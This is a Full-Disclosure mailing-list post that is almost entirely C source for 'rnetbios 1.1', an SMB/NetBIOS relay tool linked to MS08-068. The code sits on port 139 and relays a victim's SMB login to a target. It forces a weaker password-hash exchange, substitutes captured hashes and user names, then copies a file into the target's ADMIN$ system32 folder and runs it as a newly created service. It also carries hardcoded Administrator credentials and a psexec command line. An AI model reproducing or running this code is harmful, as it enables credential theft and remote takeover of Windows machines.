[Full-disclosure] rnetbios1.1 and about ms08-068






http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html




#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>
#include <winnetwk.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mpr.lib")

#define BINDNUM 10
#define THREADNUM BINDNUM
#define SERVERPORT 139
#define BUFFSIZE 0x4000
typedef struct rserver{

int socketclient;
int socketserver;
int socketconnects;
int socketconnectd;

// struct sockaddr_in iprnetbios;
// struct sockaddr_in ippsexec;
SOCKET ipclient;
SOCKET iprnetbios;
SOCKET ippsexec;
SOCKET ipdest;
// BOOL rself;
// SOCKET iprnetbios;
} RSERVER;

typedef struct rnet{

int fd;
int fd2;
int fd3;
int fd4;
int long72;
int *long72add;
int long73ok;
int *long73okadd;
int recvbytes;
char *buff;
char *buff72;
char *buff73;
char *buff73ok;
char *filename;
char *namereq;
char *namereturn;
char *ipbuff;
char *namebuff;
char *buffgetname;
char *buff0x82;

BOOL loginok;

} RNET;
typedef struct psinfo{

char *ip;
char *filename;
}PSINFO;


void psexec(PSINFO *psinfo);
void rnetbios(RSERVER *rinfo);
void rnetbiosthread(void *rinfo );
void nameuncode(char *namebuff,char *ipbuff);
void changepass(char *buff,char *buff73);
int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd);
BOOL rnetchangepacket(RNET *rnetinfo);
BOOL rnetchangepacket2(RNET *rnetinfo);

int newsend(int fd,char *buff,int size,int flag);
int main(int argc, char **argv)
{
RSERVER rinfo[THREADNUM];
int fd2;
int fd3[BINDNUM];
struct sockaddr_in s_in1,s_in2,s_in3,s_in4;
struct hostent *he;
int i; //,randnum;
int result;
BOOL loginhimself;
SOCKET d_ip,bindip;

WSADATA wsaData;
DWORD ThreadID;

printf("\n rnetbios ver 1.1.");
printf("\n copy by yuange 2000.4.7.");
printf("\n rcopy 2002.10.14.");
printf("\n welcome to my homepage http://yuange.yeah.net.";);
printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios client ip][new can netbios ip]",argv[0]);
printf("\n example:%s 0 192.168.5.9 192.168.6.9 192.168.7.9",argv[0]);
// printf("\n when somebody file:\\yourip,your host will rnetbios to the [ip] \n or his source ip if you haven't specified [ip] address");
// printf("\n After he login ,you can file:\\127.0.0.1 to the [ip] .\n ");
// psexec(1);
if(argc<5){
printf("\n error!\n");
printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios client ip][new can netbios ip]",argv[0]);
printf("\n\n");
exit(1);
}

result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(2);
}
/*
for(i=0,j=0;i<16;++i){
name=servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+6]= (name & 0x000F) + 'A';
}
namebuff[37]=0;
*/
d_ip=-1;
d_ip = inet_addr(argv[1]);
if(d_ip==-1){
he = gethostbyname(argv[1]);
if(!he) printf("\n Can't get the ip of %s !\n",argv[1]); //server);
else memcpy(&d_ip, he->h_addr, sizeof(d_ip));
}

if(d_ip==0) d_ip=-1;
if(d_ip==-1){
loginhimself=1;
printf("\n rnetbios to the netbios ip.");
}
else {
loginhimself=0;
printf("\n rnetbios to %s",argv[1]); //server);
}
s_in1.sin_addr.s_addr=d_ip;
fd2 = socket(AF_INET, SOCK_STREAM,0);
s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(SERVERPORT);
s_in2.sin_addr.s_addr = 0;
s_in2.sin_addr.s_addr = inet_addr(argv[2]);
if(s_in2.sin_addr.s_addr==0||s_in2.sin_addr.s_addr==-1){
printf("\n\n argv[2] ip error. use the ip: 192.168.0.2");
s_in2.sin_addr.s_addr = inet_addr("192.168.0.2");
}
i=bind(fd2,&s_in2, sizeof(s_in2));
if(i<0){
i=WSAGetLastError();
printf("\n bind error 0x%x",i);
exit(1);
}

i=listen(fd2,100);
if(i<0){
i=WSAGetLastError();
printf("\n bind error 0x%x",i);
exit(1);
}

s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(SERVERPORT);
s_in3.sin_addr.s_addr = 0;
s_in3.sin_addr.s_addr = inet_addr(argv[3]);
if(s_in3.sin_addr.s_addr==0||s_in3.sin_addr.s_addr==-1){
printf("\n\n argv[3] ip error. use the ip: 192.168.0.3");
s_in3.sin_addr.s_addr = inet_addr("192.168.0.3");
}

bindip=s_in3.sin_addr.s_addr;
for(i=0;i<BINDNUM;++i){
fd3[i] = socket(AF_INET, SOCK_STREAM,0);
bind(fd3[i],&s_in3, sizeof(s_in3));
listen(fd3[i],10);
s_in3.sin_addr.s_addr=ntohl(htonl(s_in3.sin_addr.s_addr)+1);
}

s_in4.sin_addr.s_addr = 0;
s_in4.sin_addr.s_addr = inet_addr(argv[4]);
if(s_in4.sin_addr.s_addr==0||s_in4.sin_addr.s_addr==-1){
printf("\n\n argv[4] ip error. use the ip: 192.168.0.4");
s_in4.sin_addr.s_addr = inet_addr("192.168.0.4");
}

for(i=0;i<THREADNUM;++i){

rinfo[i].socketclient=fd2;
rinfo[i].socketserver=fd3[i];
rinfo[i].ipclient=s_in2.sin_addr.s_addr;
rinfo[i].iprnetbios=ntohl(htonl(bindip)+i);
rinfo[i].ippsexec=s_in4.sin_addr.s_addr;
rinfo[i].ipdest=d_ip;
CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)rnetbiosthread,(LPVOID)&rinfo[i],(DWORD)0,(LPDWORD)&ThreadID);

}
Sleep(0x7fffffff);
// closesocket(fd1);
closesocket(fd2);
// closesocket(fd3);
// closesocket(fd4);
WSACleanup( );
return(0);
}

void psexec(PSINFO *info)
{
/*
SECURITY_ATTRIBUTES sa;
PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
STARTUPINFO siinfo;

*/
PSINFO psinfo=*info;
NETRESOURCE lpNetResource;
int fd1,i;
// char *ip2;
char cmdstr[0x100];
char res[0x100];
char filename[0x100];
char tempfilename[0x100];
char ser[0x100];
// char *name="cc.exe";
char *user="Administrator";
char *pass="test";
SC_HANDLE scm,svc;
char *cmdstrformat="psexec.exe \\\\%s -u Administrator -p test -s cmd.exe";
// char *cmdstrformat="\\\\%s\\admin$ ";
// fd1=*(int *)(ip);
// ip2=*(int *)(ip+4)+8;
// ip2="192.168.70.29";
wsprintf(cmdstr,cmdstrformat,psinfo.ip); //"127.0.0.1"); //
GetTempPath(0x100,tempfilename);
GetTempFileName(tempfilename,NULL,NULL,tempfilename);
DeleteFile(tempfilename);
for(i=strlen(tempfilename);i>0;--i){
if(tempfilename[i]=='\\')
{
strcpy(tempfilename,tempfilename+i+1);
break;
}
}
// system(cmdstr);
// ExitThread(0);
wsprintf(res,"\\\\%s\\admin$",psinfo.ip);
wsprintf(filename,"\\\\%s\\admin$\\system32\\%s",psinfo.ip,tempfilename);
wsprintf(ser,"\\\\%s",psinfo.ip);
lpNetResource.dwScope=RESOURCE_CONNECTED;
lpNetResource.dwType =RESOURCETYPE_DISK;
lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
lpNetResource.lpLocalName=NULL;
lpNetResource.lpRemoteName=res;
lpNetResource.lpComment=NULL;
lpNetResource.lpProvider=NULL;

i=WNetAddConnection2A(&lpNetResource,user,pass,CONNECT_UPDATE_PROFILE);
scm=OpenSCManager(ser,NULL,SC_MANAGER_CREATE_SERVICE);
printf("\n scm=0x%x err=0x%x ip=%s",scm,GetLastError(),psinfo.ip);
svc=CreateService(scm,tempfilename,tempfilename,SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE, tempfilename,NULL,NULL,NULL,NULL,NULL);
if(svc==NULL) svc=OpenService(scm,tempfilename,SERVICE_ALL_ACCESS);
printf("\n svc=0x%x err=0x%x",svc,GetLastError());
i=CopyFile(psinfo.filename,filename,TRUE);
printf("\n copy file error=0x%x ip=%s", GetLastError(),psinfo.ip);

i=StartService(svc,0,NULL);
printf("\n i=0x%x error=0x%x",i,GetLastError());
i=DeleteService(svc);
DeleteFile(filename);


// printf("\n cmdstr=%s\n",cmdstr);
/*
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;

CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);

ZeroMemory(&siinfo,sizeof(siinfo));

siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// CreateProcess(NULL,&cmdstr,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
*/
// system(cmdstr);

// printf("\n psexec end. closesocket fd1=0x%x",fd1);

CloseServiceHandle(scm);
CloseServiceHandle(svc);
// closesocket(fd1);
// closesocket(fd2);
i=WNetCancelConnection2A(res,CONNECT_UPDATE_PROFILE,TRUE);
ExitThread(0);
printf("\n Exitthread erro1 !");
return;
}

void rnetbiosthread(RSERVER *rinfoadd)
{

RSERVER rinfo;
int i,fd1,fd2;
struct sockaddr_in s_in1,s_in2;
SOCKET dip;
rinfo=*rinfoadd;
// memcpy(&rinfo,rinfoadd,sizeof(rinfo));
dip=rinfo.ipdest;
while(1)
{
i=sizeof(struct sockaddr);
fd1=accept(rinfo.socketclient,&s_in1,&i);
if(s_in1.sin_addr.s_addr!=rinfo.ipclient)
{

if(rinfo.ipdest==-1) dip=s_in1.sin_addr.s_addr;
fd2 = socket(AF_INET, SOCK_STREAM,0);
s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(SERVERPORT);
s_in2.sin_addr.s_addr = dip;
printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
if(!connect(fd2, (struct sockaddr *)&s_in2, sizeof(struct sockaddr_in)))
{

printf("\n Connect %s ok!",inet_ntoa(s_in2.sin_addr));
rinfo.socketconnects=fd1;
rinfo.socketconnectd=fd2;

rnetbios(&rinfo);
// printf("\n rnetbios return");
}
else printf("\n Connect %s error!",inet_ntoa(s_in2.sin_addr));
closesocket(fd2);
}
closesocket(fd1);
}

ExitThread(1);

}
void rnetbios(RSERVER *rinfoadd)
{

RNET rnetinfo;
RSERVER rinfo=*rinfoadd;
// PSINFO psinfo;
int fd,fd2,fd3,fd4;
struct sockaddr_in s_in1,s_in2,s_in4;

char buff[BUFFSIZE+1];
char buff72[BUFFSIZE+1];
char buff73[BUFFSIZE+1];
char buff73ok[BUFFSIZE+1];
char filename[BUFFSIZE+1];
char buff0x82[]={0x82,0,0,0};
char namereq[]={0x81,0,0,0};
// int long72=0;

u_short name;
char buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};
char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46
,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00
,0x20,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,0x43,0x41,0x43,0x41
,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,00
};
char ipbuff[0x100];
char namereturn[]={0x82,0,0,0,0,0};

struct sockaddr addr2;
int i,j,k,exitcode;
//,k,l,ii;
// int usernameaddress1;
// int usernameaddress2;


// int strflg1,strflg2;
DWORD ThreadID;
HANDLE threadhandle=0;

// BOOL loginok;

s_in1.sin_addr.s_addr=rinfo.iprnetbios;
wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
nameuncode(namebuff,ipbuff);

fd=fd2;
fd2=rinfo.socketconnects;
fd3=rinfo.socketconnectd;
fd4=0;
rnetinfo.fd2=fd2;
rnetinfo.fd3=fd3;
rnetinfo.fd4=fd4;
rnetinfo.buff=buff;
rnetinfo.buff72=buff72;
rnetinfo.buff73=buff73;
rnetinfo.buff73ok=buff73ok;
rnetinfo.filename=filename;
rnetinfo.buffgetname=buffgetname;
rnetinfo.ipbuff=ipbuff;
rnetinfo.namebuff=namebuff;
rnetinfo.buff0x82=buff0x82;
rnetinfo.namereq=namereq;
rnetinfo.long72add=&rnetinfo.long72;
rnetinfo.long72=0;
rnetinfo.long73okadd=&rnetinfo.long73ok;
rnetinfo.long73ok=0;
rnetinfo.loginok=FALSE;

// printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
i = 1;
ioctlsocket(fd2, FIONBIO, &i);
i = 1;
ioctlsocket(fd3, FIONBIO, &i);

i = 1;
ioctlsocket(rinfo.socketserver, FIONBIO, &i);


ThreadID=0;
memset(buff,0,BUFFSIZE);
memset(filename,0,BUFFSIZE);
while(1)
{
if(rnetinfo.loginok==TRUE)
{
i=GetExitCodeThread(threadhandle,&exitcode);
if(i==1&&exitcode!=STILL_ACTIVE){
// printf("\n psexec exit 0x%x code",exitcode);
break;
}
}
Sleep(5);

// if(rnetinfo.loginok==TRUE) recv(fd2,buff,BUFFSIZE,0);
i=recv(fd,buff,BUFFSIZE,0);
if(i<=0&&WSAGetLastError()==0x2746) {
// printf("\n recv fd 0x%x bytes. error=0x2746",i);
break;
}
if(i>0)
{
rnetinfo.recvbytes=i;
if(rnetchangepacket(&rnetinfo)==TRUE)
{
threadhandle=waitfd4(&rnetinfo,&rinfo);

}
memset(buff,0,BUFFSIZE);

}


i=recv(fd3,buff,BUFFSIZE,0);
if(i<=0&&WSAGetLastError()==0x2746) {
// printf("\n recv fd3 0x%x bytes. error=0x2746",i);
break;
}
if(i>0)
{
rnetinfo.recvbytes=i;
if(rnetchangepacket2(&rnetinfo)==TRUE)
{
threadhandle=waitfd4(&rnetinfo,&rinfo);

}
memset(buff,0,BUFFSIZE);

}
if(rnetinfo.loginok==FALSE) fd=fd2;
else fd=rnetinfo.fd4;
rnetinfo.fd=fd;

}

closesocket(fd2);
closesocket(fd3);
closesocket(rnetinfo.fd4);
CloseHandle(threadhandle);
return;
}




void nameuncode(char *namebuff,char *ipbuff)
{
int i,j;
u_short name;
char servername[]={"*SMBSERVER"};
for(i=0,j=0;i<16;++i){
name=ipbuff[i]; //servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+0x27]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+0x28]= (name & 0x000F) + 'A';
}
for(i=0,j=0;i<16;++i){
name=servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+6]= (name & 0x000F) + 'A';
}
namebuff[0x25]=0;
namebuff[0x47]=0;
return;
}


int newsend(int fd,char *buff,int size,int flag)
{
int j;
int i = 0;
ioctlsocket(fd, FIONBIO, &i);
j=send(fd,buff,size,flag);
i = 1;
ioctlsocket(fd, FIONBIO, &i);
return j;
}

void changepass(char *buff11,char *buff7311)
{

char *buff=*(int *)buff11;
char *buff73=*(int *)buff7311;
int usernameaddress1;
int usernameaddress2;
int strflg1,strflg2;
u_short name;
memcpy(buff+0x41,buff73+0x41,0x18);
// copy password
if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff73+0x41+0x18,0x18);

// copy the next password
strflg1=buff73[0x0f];
strflg1&=0x80;
if(strflg1!=0) strflg1=1;
strflg2=buff[0x0f];
strflg2&=0x80;
if(strflg2!=0) strflg2=1;
//str is unicode ?
usernameaddress1=0x41+0x18+buff73[0x35]+strflg1;
usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
name=1;
while(name!=0){
name=buff73[usernameaddress1];
if(strflg1==0) ++usernameaddress1;
else usernameaddress1+=2;
buff[usernameaddress2]=name;
++usernameaddress2;
if(strflg2!=0) {
++usernameaddress2;
buff[usernameaddress2]=0;
}
}
// copy user name ,不够严谨,不过勉强能用。
}

BOOL rnetchangepacket(RNET *rnetinfoadd)
{


char filename[0x100];
unsigned char name;
int i,j,k;
RNET rnetinfo=*rnetinfoadd;
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32)
{
i=*(WORD *)(rnetinfo.buff+0x41);
if(i==0x05&&rnetinfo.recvbytes>0x4e&&rnetinfo.buff[0x4e]!=0)
{
memcpy(rnetinfo.filename,rnetinfo.buff+0x4e,rnetinfo.recvbytes-0x4e);
// *(int *)(rnetinfo.buff+9)=0xc0000016;
// rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
// closesocket(rnetinfo.fd2);
printf("\n get file name ok!");
return(TRUE);
}
if(i==0x01&&rnetinfo.recvbytes>0x54&&rnetinfo.buff[0x54]!=0)
{
memcpy(rnetinfo.filename,rnetinfo.buff+0x54,rnetinfo.recvbytes-0x54);
// *(int *)(rnetinfo.buff+9)=0xc0000016;
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
// closesocket(rnetinfo.fd2);

printf("\n get file name ok!");
return(TRUE);
}
}

if(rnetinfo.buff[0x8]==0x72)
{
if(rnetinfo.loginok==FALSE)
{
// memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
memset(rnetinfo.buff+0xc,0,4);
rnetinfo.long72=rnetinfo.recvbytes;
//这儿是系统支持什么服务的标记,WIN2000与WINNT系统不一样。
//有一方是WINNT看一般就是0,而两方都是WIN2000后面协议的密码方式就不一样。
//设置成0,欺骗让其以WINNT的方式发送加密的密码,以好截获。但可能WIN2000支持不好。
// printf("\n fd2 recv smb 0x72 packet ");
}
else
{
memcpy(rnetinfo.buff72+0x1c,rnetinfo.buff+0x1c,8);
memcpy(rnetinfo.buff,rnetinfo.buff72,rnetinfo.long72);
// printf("\n send smb 0x72 packet .");
rnetinfo.buff[0x25]=5;
//run in win9x.the win9x netbios client use
//这儿客户端可能要WIN9X,不知道WINT。WIN2000怎么处理。
newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.long72,0);
return(FALSE);
rnetinfo.recvbytes=0;
}

}
if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
{

if(rnetinfo.loginok==FALSE)
{
if(rnetinfo.buff[0x33]==0x18)
{
memcpy(rnetinfo.buff73,rnetinfo.buff,rnetinfo.recvbytes);
}

i=*(WORD *)(rnetinfo.buff+0x27);
if(rnetinfo.buff[0x8]==0x75) i=0x20;
j=*(unsigned char *)(rnetinfo.buff+0x4+i);
i+=*(WORD *)(rnetinfo.buff+i+0x0b);
i=i+2*j+7;
memcpy(filename,rnetinfo.buff+i,sizeof(filename));
j=1;
if(filename[1]==0) j=2;
for(i=0,k=0;i<0x100;i+=j,++k)
{
name=filename[i];
filename[k]=name;
// if(i==0&&name=='\\') k-=1;
}
for(i=strlen(filename);i>0;--i)
{
name=filename[i];
if(name=='\\')
{
strcpy(filename,filename+i+1);
break;
}
}


if(strcmp(filename,"IPC$")!=0&&strcmp(filename,"ADMIN$")!=0)
{

strcpy(rnetinfo.filename,filename);
printf("\n file name=%s",filename);
// closesocket(rnetinfo.fd2);
// printf("\n the new get file name ok!");
return(TRUE);
}
}
else{


if(rnetinfo.buff[0x33]==0x18)
{
// printf("\n send login ok packet.");
// printf("\n send login ok packet.");
// newsend(rnetinfo.fd,rnetinfo.buff73ok,rnetinfo.long73ok,0);
// return;
changepass(&rnetinfo.buff,&rnetinfo.buff73);
memcpy(rnetinfo.buff+0x20,rnetinfo.buff73ok+0x20,2); //user id
}
}
}
if(memcmp(rnetinfo.buff,rnetinfo.namereq,3)==0)
{
if(rnetinfo.loginok==FALSE)
{
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
// printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
}
else
{
rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff0x82,0x6,0);
// rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
// printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
}
}
else
{
if(rnetinfo.loginok==FALSE) rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
else
{
// memcpy(rnetinfo.buff73+0x1c,rnetinfo.buff73ok+0x1c,8);
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
}

// printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);

}
return(FALSE);
}


BOOL rnetchangepacket2(RNET *rnetinfoadd)
{
RNET rnetinfo=*rnetinfoadd;
if(rnetinfo.buff[0x8]==0x72)
{
if(rnetinfo.loginok==FALSE){
memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
// memset(rnetinfo.buff+0xc,0,4);
*rnetinfo.long72add=rnetinfo.recvbytes;

}

}
if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
{
if(*(int *)(rnetinfo.buff+9)==0&&rnetinfo.buff73[0x33]==0x18&&rnetinfo.loginok==FALSE)
{
memcpy(rnetinfo.buff73ok,rnetinfo.buff,rnetinfo.recvbytes);
*rnetinfo.long73okadd=rnetinfo.recvbytes;
// rnetinfo.loginok=TRUE;
// closesocket(rnetinfo.fd2);
printf("\n now login ok!");
// rnetinfo.recvbytes=0;
// return(TRUE);
}

}

if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
{
// *(int *)(rnetinfo.buff+9)=0xc0000016;
}
rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.recvbytes,0);
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
{
// closesocket(rnetinfo.fd2);
// return(TRUE);
}
// printf("\n send fd 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
return(FALSE);
}

int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd)
{
// RNET rnetinfo=*rnet;
RSERVER rinfo=*rinfoadd;
int i,j,k,threadhandle,exitcode;
unsigned char name;
char *ipbuff[0x100];
PSINFO psinfo;
struct sockaddr_in s_in1,s_in2,s_in4;
struct sockaddr addr2;
DWORD ThreadID;
rnetinfo->loginok=TRUE;
s_in1.sin_addr.s_addr=rinfo.iprnetbios;
wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
psinfo.ip=&ipbuff;
/*
i=*(WORD *)(rnetinfo->buff73+0x27);
j=*(unsigned char *)(rnetinfo->buff73+0x4+i);
i+=*(WORD *)(rnetinfo->buff73+i+0x0b);
i=i+2*j+7;
psinfo.filename=rnetinfo->buff73+i;
j=1;
if(psinfo.filename[1]==0) j=2;
for(i=0,k=0;i<0x100;i+=j,++k)
{
name=psinfo.filename[i];
psinfo.filename[k]=name;
// if(i==0&&name=='\\') k-=1;
}
for(i=strlen(psinfo.filename);i>0;--i)
{
name=psinfo.filename[i];
if(name=='\\')
{
strcpy(psinfo.filename,psinfo.filename+i+1);
break;
}
}
*/

psinfo.filename=rnetinfo->filename;
j=1;
if(rnetinfo->filename[1]==0) j=2;
for(i=0,k=0;i<0x100;i+=j,++k)
{
name=rnetinfo->filename[i];
rnetinfo->filename[k]=name;
if(i==0&&name=='\\') k-=1;
}

printf("\n filename=%s\n",psinfo.filename);
threadhandle=CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)psexec,(LPVOID)&psinfo,(DWORD)0,(LPDWORD)&ThreadID);
// break;
while(1){
Sleep(5);
if(rnetinfo->loginok==TRUE)
{
i=GetExitCodeThread(threadhandle,&exitcode);
if(i==1&&exitcode!=STILL_ACTIVE){
// printf("\n psexec exit 0x%x code",exitcode);
break;
}
}

i=sizeof(struct sockaddr);
rnetinfo->fd4=accept(rinfo.socketserver,&addr2,&i);

memcpy(&s_in4,&addr2,15);
if(rnetinfo->fd4>0)
{
if(s_in4.sin_addr.s_addr!=rinfo.ippsexec){
printf("\n fd4 error.");
closesocket(rnetinfo->fd4);
}
else
{
printf("\n fd4 ok! ip=%s",ipbuff);
break;
}
}
}

return(threadhandle);
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/